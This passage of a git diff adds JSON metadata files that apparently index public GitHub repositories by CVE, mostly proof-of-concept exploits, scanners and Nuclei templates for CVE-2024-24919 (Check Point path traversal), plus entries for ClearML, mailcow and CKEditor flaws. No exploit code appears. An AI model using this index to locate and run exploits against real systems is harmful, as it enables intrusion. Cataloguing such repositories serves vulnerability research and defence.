+ "description": "Deserialization of untrusted data can occur in versions 0.17.0 to 1.14.2 of the client SDK of Allegro AI’s ClearML platform, enabling a maliciously uploaded artifact to run arbitrary code on an end user’s system when interacted with.",
+ "fork": false,
+ "created_at": "2024-06-20T11:23:56Z",
+ "updated_at": "2024-06-21T00:52:48Z",
+ "pushed_at": "2024-06-21T00:52:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24760.json b/2024/CVE-2024-24760.json
new file mode 100644
index 0000000000..ff4b135c0b
--- /dev/null
+++ b/2024/CVE-2024-24760.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 766707015,
+ "name": "CVE-2024-24760",
+ "full_name": "killerbees19\/CVE-2024-24760",
+ "owner": {
+ "login": "killerbees19",
+ "id": 21372289,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21372289?v=4",
+ "html_url": "https:\/\/github.com\/killerbees19"
+ },
+ "html_url": "https:\/\/github.com\/killerbees19\/CVE-2024-24760",
+ "description": "mailcow: Docker Container Exposure to Local Network",
+ "fork": false,
+ "created_at": "2024-03-04T00:53:35Z",
+ "updated_at": "2024-03-04T00:53:35Z",
+ "pushed_at": "2024-03-04T00:54:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24787.json b/2024/CVE-2024-24787.json
new file mode 100644
index 0000000000..1a152cfbaa
--- /dev/null
+++ b/2024/CVE-2024-24787.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798649279,
+ "name": "CVE-2024-24787-PoC",
+ "full_name": "LOURC0D3\/CVE-2024-24787-PoC",
+ "owner": {
+ "login": "LOURC0D3",
+ "id": 83567597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4",
+ "html_url": "https:\/\/github.com\/LOURC0D3"
+ },
+ "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-24787-PoC",
+ "description": "CVE-2024-24787 Proof of Concept",
+ "fork": false,
+ "created_at": "2024-05-10T07:45:51Z",
+ "updated_at": "2024-05-14T06:17:31Z",
+ "pushed_at": "2024-05-10T08:03:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24816.json b/2024/CVE-2024-24816.json
new file mode 100644
index 0000000000..3ecff61394
--- /dev/null
+++ b/2024/CVE-2024-24816.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 755475889,
+ "name": "CVE-2024-24816",
+ "full_name": "afine-com\/CVE-2024-24816",
+ "owner": {
+ "login": "afine-com",
+ "id": 105647610,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4",
+ "html_url": "https:\/\/github.com\/afine-com"
+ },
+ "html_url": "https:\/\/github.com\/afine-com\/CVE-2024-24816",
+ "description": "CKEditor 4 < 4.24.0-lts - XSS vulnerability in samples that use the \"preview\" feature.",
+ "fork": false,
+ "created_at": "2024-02-10T10:26:35Z",
+ "updated_at": "2024-05-22T14:25:57Z",
+ "pushed_at": "2024-02-10T10:32:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-24919.json b/2024/CVE-2024-24919.json
new file mode 100644
index 0000000000..76741c5cc5
--- /dev/null
+++ b/2024/CVE-2024-24919.json
@@ -0,0 +1,1454 @@
+[
+ {
+ "id": 808011196,
+ "name": "CVE-2024-24919",
+ "full_name": "c3rrberu5\/CVE-2024-24919",
+ "owner": {
+ "login": "c3rrberu5",
+ "id": 109983457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4",
+ "html_url": "https:\/\/github.com\/c3rrberu5"
+ },
+ "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2024-24919",
+ "description": "Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.",
+ "fork": false,
+ "created_at": "2024-05-30T07:55:53Z",
+ "updated_at": "2024-06-07T00:49:49Z",
+ "pushed_at": "2024-05-30T07:58:10Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808179001,
+ "name": "CVE-2024-24919",
+ "full_name": "emanueldosreis\/CVE-2024-24919",
+ "owner": {
+ "login": "emanueldosreis",
+ "id": 5330737,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4",
+ "html_url": "https:\/\/github.com\/emanueldosreis"
+ },
+ "html_url": "https:\/\/github.com\/emanueldosreis\/CVE-2024-24919",
+ "description": "POC exploit for CVE-2024-24919 information leakage ",
+ "fork": false,
+ "created_at": "2024-05-30T14:41:32Z",
+ "updated_at": "2024-06-06T21:50:55Z",
+ "pushed_at": "2024-05-30T18:56:32Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808207791,
+ "name": "CVE-2024-24919",
+ "full_name": "hendprw\/CVE-2024-24919",
+ "owner": {
+ "login": "hendprw",
+ "id": 128204375,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128204375?v=4",
+ "html_url": "https:\/\/github.com\/hendprw"
+ },
+ "html_url": "https:\/\/github.com\/hendprw\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-30T15:40:11Z",
+ "updated_at": "2024-05-30T15:42:26Z",
+ "pushed_at": "2024-05-30T15:42:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808225578,
+ "name": "CVE-2024-24919",
+ "full_name": "LucasKatashi\/CVE-2024-24919",
+ "owner": {
+ "login": "LucasKatashi",
+ "id": 41309932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41309932?v=4",
+ "html_url": "https:\/\/github.com\/LucasKatashi"
+ },
+ "html_url": "https:\/\/github.com\/LucasKatashi\/CVE-2024-24919",
+ "description": "CVE-2024-24919 Exploit PoC",
+ "fork": false,
+ "created_at": "2024-05-30T16:23:18Z",
+ "updated_at": "2024-06-06T21:53:06Z",
+ "pushed_at": "2024-05-30T17:08:11Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-24919",
+ "exploit",
+ "lfi",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808251805,
+ "name": "CVE-2024-24919",
+ "full_name": "eoslvs\/CVE-2024-24919",
+ "owner": {
+ "login": "eoslvs",
+ "id": 170684196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170684196?v=4",
+ "html_url": "https:\/\/github.com\/eoslvs"
+ },
+ "html_url": "https:\/\/github.com\/eoslvs\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-30T17:26:08Z",
+ "updated_at": "2024-06-01T00:09:54Z",
+ "pushed_at": "2024-06-01T00:09:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808315341,
+ "name": "CVE-2024-24919",
+ "full_name": "Bytenull00\/CVE-2024-24919",
+ "owner": {
+ "login": "Bytenull00",
+ "id": 19710178,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19710178?v=4",
+ "html_url": "https:\/\/github.com\/Bytenull00"
+ },
+ "html_url": "https:\/\/github.com\/Bytenull00\/CVE-2024-24919",
+ "description": "Quick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in CHECKPOINT",
+ "fork": false,
+ "created_at": "2024-05-30T20:14:19Z",
+ "updated_at": "2024-06-09T20:21:52Z",
+ "pushed_at": "2024-05-30T21:49:43Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808371269,
+ "name": "CVE-2024-24919",
+ "full_name": "am-eid\/CVE-2024-24919",
+ "owner": {
+ "login": "am-eid",
+ "id": 95753520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95753520?v=4",
+ "html_url": "https:\/\/github.com\/am-eid"
+ },
+ "html_url": "https:\/\/github.com\/am-eid\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-30T23:52:53Z",
+ "updated_at": "2024-05-31T00:06:43Z",
+ "pushed_at": "2024-05-31T00:06:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808389014,
+ "name": "CVE-2024-24919",
+ "full_name": "P3wc0\/CVE-2024-24919",
+ "owner": {
+ "login": "P3wc0",
+ "id": 66764041,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66764041?v=4",
+ "html_url": "https:\/\/github.com\/P3wc0"
+ },
+ "html_url": "https:\/\/github.com\/P3wc0\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T01:14:19Z",
+ "updated_at": "2024-05-31T01:39:05Z",
+ "pushed_at": "2024-05-31T01:39:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808505785,
+ "name": "CVE-2024-24919",
+ "full_name": "zam89\/CVE-2024-24919",
+ "owner": {
+ "login": "zam89",
+ "id": 3533227,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3533227?v=4",
+ "html_url": "https:\/\/github.com\/zam89"
+ },
+ "html_url": "https:\/\/github.com\/zam89\/CVE-2024-24919",
+ "description": "Simple POC Python script that check & leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)",
+ "fork": false,
+ "created_at": "2024-05-31T07:59:17Z",
+ "updated_at": "2024-05-31T14:05:10Z",
+ "pushed_at": "2024-05-31T08:16:57Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-24919",
+ "exploit",
+ "poc",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808506486,
+ "name": "CVE-2024-24919",
+ "full_name": "satriarizka\/CVE-2024-24919",
+ "owner": {
+ "login": "satriarizka",
+ "id": 42266999,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42266999?v=4",
+ "html_url": "https:\/\/github.com\/satriarizka"
+ },
+ "html_url": "https:\/\/github.com\/satriarizka\/CVE-2024-24919",
+ "description": "A simple bash and python script to check for the vulnerability CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-05-31T08:01:13Z",
+ "updated_at": "2024-05-31T09:02:26Z",
+ "pushed_at": "2024-05-31T08:37:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checker",
+ "cve-2024-24919",
+ "poc",
+ "python",
+ "shell"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808546456,
+ "name": "CVE-2024-24919",
+ "full_name": "3UR\/CVE-2024-24919",
+ "owner": {
+ "login": "3UR",
+ "id": 76826837,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76826837?v=4",
+ "html_url": "https:\/\/github.com\/3UR"
+ },
+ "html_url": "https:\/\/github.com\/3UR\/CVE-2024-24919",
+ "description": "CLI based PoC for CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-05-31T09:43:14Z",
+ "updated_at": "2024-06-08T06:29:24Z",
+ "pushed_at": "2024-06-08T06:29:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808560094,
+ "name": "CVE-2024-24919",
+ "full_name": "RevoltSecurities\/CVE-2024-24919",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-24919",
+ "description": "An Vulnerability detection and Exploitation tool for CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-05-31T10:18:36Z",
+ "updated_at": "2024-06-13T12:52:14Z",
+ "pushed_at": "2024-06-05T11:38:12Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808586285,
+ "name": "CVE-2024-24919",
+ "full_name": "Vulnpire\/CVE-2024-24919",
+ "owner": {
+ "login": "Vulnpire",
+ "id": 89225495,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89225495?v=4",
+ "html_url": "https:\/\/github.com\/Vulnpire"
+ },
+ "html_url": "https:\/\/github.com\/Vulnpire\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T11:29:03Z",
+ "updated_at": "2024-05-31T11:36:29Z",
+ "pushed_at": "2024-05-31T11:36:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808595288,
+ "name": "CVE-2024-24919-POC",
+ "full_name": "seed1337\/CVE-2024-24919-POC",
+ "owner": {
+ "login": "seed1337",
+ "id": 99613932,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99613932?v=4",
+ "html_url": "https:\/\/github.com\/seed1337"
+ },
+ "html_url": "https:\/\/github.com\/seed1337\/CVE-2024-24919-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T11:52:59Z",
+ "updated_at": "2024-06-25T12:30:51Z",
+ "pushed_at": "2024-05-31T22:55:07Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808601031,
+ "name": "CVE-2024-24919",
+ "full_name": "0x3f3c\/CVE-2024-24919",
+ "owner": {
+ "login": "0x3f3c",
+ "id": 154844497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4",
+ "html_url": "https:\/\/github.com\/0x3f3c"
+ },
+ "html_url": "https:\/\/github.com\/0x3f3c\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T12:08:28Z",
+ "updated_at": "2024-06-07T12:15:19Z",
+ "pushed_at": "2024-06-01T12:22:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808601596,
+ "name": "CVE-2024-24919-Check-Point-Remote-Access-VPN",
+ "full_name": "Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN",
+ "owner": {
+ "login": "Praison001",
+ "id": 60835238,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4",
+ "html_url": "https:\/\/github.com\/Praison001"
+ },
+ "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-24919-Check-Point-Remote-Access-VPN",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T12:10:05Z",
+ "updated_at": "2024-06-02T12:40:00Z",
+ "pushed_at": "2024-06-02T12:39:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808610745,
+ "name": "CVE-2024-24919-nuclei-templater",
+ "full_name": "smackerdodi\/CVE-2024-24919-nuclei-templater",
+ "owner": {
+ "login": "smackerdodi",
+ "id": 36116795,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36116795?v=4",
+ "html_url": "https:\/\/github.com\/smackerdodi"
+ },
+ "html_url": "https:\/\/github.com\/smackerdodi\/CVE-2024-24919-nuclei-templater",
+ "description": "Nuclei template for CVE-2024-24919 ",
+ "fork": false,
+ "created_at": "2024-05-31T12:33:34Z",
+ "updated_at": "2024-06-10T03:36:49Z",
+ "pushed_at": "2024-05-31T12:35:30Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808625857,
+ "name": "CVE-2024-24919",
+ "full_name": "GoatSecurity\/CVE-2024-24919",
+ "owner": {
+ "login": "GoatSecurity",
+ "id": 153397256,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153397256?v=4",
+ "html_url": "https:\/\/github.com\/GoatSecurity"
+ },
+ "html_url": "https:\/\/github.com\/GoatSecurity\/CVE-2024-24919",
+ "description": "CVE-2024-24919 exploit",
+ "fork": false,
+ "created_at": "2024-05-31T13:11:40Z",
+ "updated_at": "2024-06-16T14:15:34Z",
+ "pushed_at": "2024-05-31T15:50:57Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808722851,
+ "name": "CVE-2024-24919",
+ "full_name": "GlobalsecureAcademy\/CVE-2024-24919",
+ "owner": {
+ "login": "GlobalsecureAcademy",
+ "id": 30742368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30742368?v=4",
+ "html_url": "https:\/\/github.com\/GlobalsecureAcademy"
+ },
+ "html_url": "https:\/\/github.com\/GlobalsecureAcademy\/CVE-2024-24919",
+ "description": "Exploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs",
+ "fork": false,
+ "created_at": "2024-05-31T17:14:48Z",
+ "updated_at": "2024-06-07T05:01:41Z",
+ "pushed_at": "2024-05-31T17:31:32Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808733143,
+ "name": "CVE-2024-24919",
+ "full_name": "nexblade12\/CVE-2024-24919",
+ "owner": {
+ "login": "nexblade12",
+ "id": 168243165,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168243165?v=4",
+ "html_url": "https:\/\/github.com\/nexblade12"
+ },
+ "html_url": "https:\/\/github.com\/nexblade12\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T17:41:08Z",
+ "updated_at": "2024-06-02T01:37:00Z",
+ "pushed_at": "2024-05-31T17:51:05Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808745521,
+ "name": "CVE-2024-24919",
+ "full_name": "un9nplayer\/CVE-2024-24919",
+ "owner": {
+ "login": "un9nplayer",
+ "id": 75741506,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75741506?v=4",
+ "html_url": "https:\/\/github.com\/un9nplayer"
+ },
+ "html_url": "https:\/\/github.com\/un9nplayer\/CVE-2024-24919",
+ "description": "This repository contains a proof-of-concept (PoC) exploit for CVE-2024-24919, a critical vulnerability discovered in Check Point SVN. The vulnerability allows for reading system files. CVE ID: CVE-2024-24919",
+ "fork": false,
+ "created_at": "2024-05-31T18:14:19Z",
+ "updated_at": "2024-06-09T05:24:59Z",
+ "pushed_at": "2024-06-05T16:13:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808815211,
+ "name": "CVE-2024-24919",
+ "full_name": "MohamedWagdy7\/CVE-2024-24919",
+ "owner": {
+ "login": "MohamedWagdy7",
+ "id": 31960035,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31960035?v=4",
+ "html_url": "https:\/\/github.com\/MohamedWagdy7"
+ },
+ "html_url": "https:\/\/github.com\/MohamedWagdy7\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-31T22:07:21Z",
+ "updated_at": "2024-05-31T23:39:55Z",
+ "pushed_at": "2024-05-31T23:39:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808853728,
+ "name": "CVE-2024-24919",
+ "full_name": "Cappricio-Securities\/CVE-2024-24919",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-24919",
+ "description": "Check Point Security Gateway (LFI)",
+ "fork": false,
+ "created_at": "2024-06-01T01:33:00Z",
+ "updated_at": "2024-06-24T10:03:27Z",
+ "pushed_at": "2024-06-24T10:02:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "check-point-security-gateway",
+ "cve-2024-24919",
+ "cve-2024-24919-exploit",
+ "cve-2024-24919-lfi",
+ "cve-2024-24919-poc",
+ "cve-2024-24919-scanner",
+ "information-disclosure",
+ "lfi",
+ "path-traversal"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 808862082,
+ "name": "CVE-2024-24919",
+ "full_name": "fernandobortotti\/CVE-2024-24919",
+ "owner": {
+ "login": "fernandobortotti",
+ "id": 61474323,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61474323?v=4",
+ "html_url": "https:\/\/github.com\/fernandobortotti"
+ },
+ "html_url": "https:\/\/github.com\/fernandobortotti\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-01T02:20:28Z",
+ "updated_at": "2024-06-19T18:40:50Z",
+ "pushed_at": "2024-06-01T03:44:23Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808870264,
+ "name": "CVE-2024-24919",
+ "full_name": "nicolvsrlr27\/CVE-2024-24919",
+ "owner": {
+ "login": "nicolvsrlr27",
+ "id": 62434396,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62434396?v=4",
+ "html_url": "https:\/\/github.com\/nicolvsrlr27"
+ },
+ "html_url": "https:\/\/github.com\/nicolvsrlr27\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-01T03:05:35Z",
+ "updated_at": "2024-06-01T03:05:35Z",
+ "pushed_at": "2024-06-01T03:05:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808874379,
+ "name": "CVE-2024-24919",
+ "full_name": "gurudattch\/CVE-2024-24919",
+ "owner": {
+ "login": "gurudattch",
+ "id": 119776344,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119776344?v=4",
+ "html_url": "https:\/\/github.com\/gurudattch"
+ },
+ "html_url": "https:\/\/github.com\/gurudattch\/CVE-2024-24919",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-01T03:26:29Z",
+ "updated_at": "2024-06-01T05:56:57Z",
+ "pushed_at": "2024-06-01T05:56:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808967131,
+ "name": "CVE-2024-24919",
+ "full_name": "YN1337\/CVE-2024-24919",
+ "owner": {
+ "login": "YN1337",
+ "id": 88143447,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88143447?v=4",
+ "html_url": "https:\/\/github.com\/YN1337"
+ },
+ "html_url": "https:\/\/github.com\/YN1337\/CVE-2024-24919",
+ "description": "Mass scanner for CVE-2024-24919",
+ "fork": false,
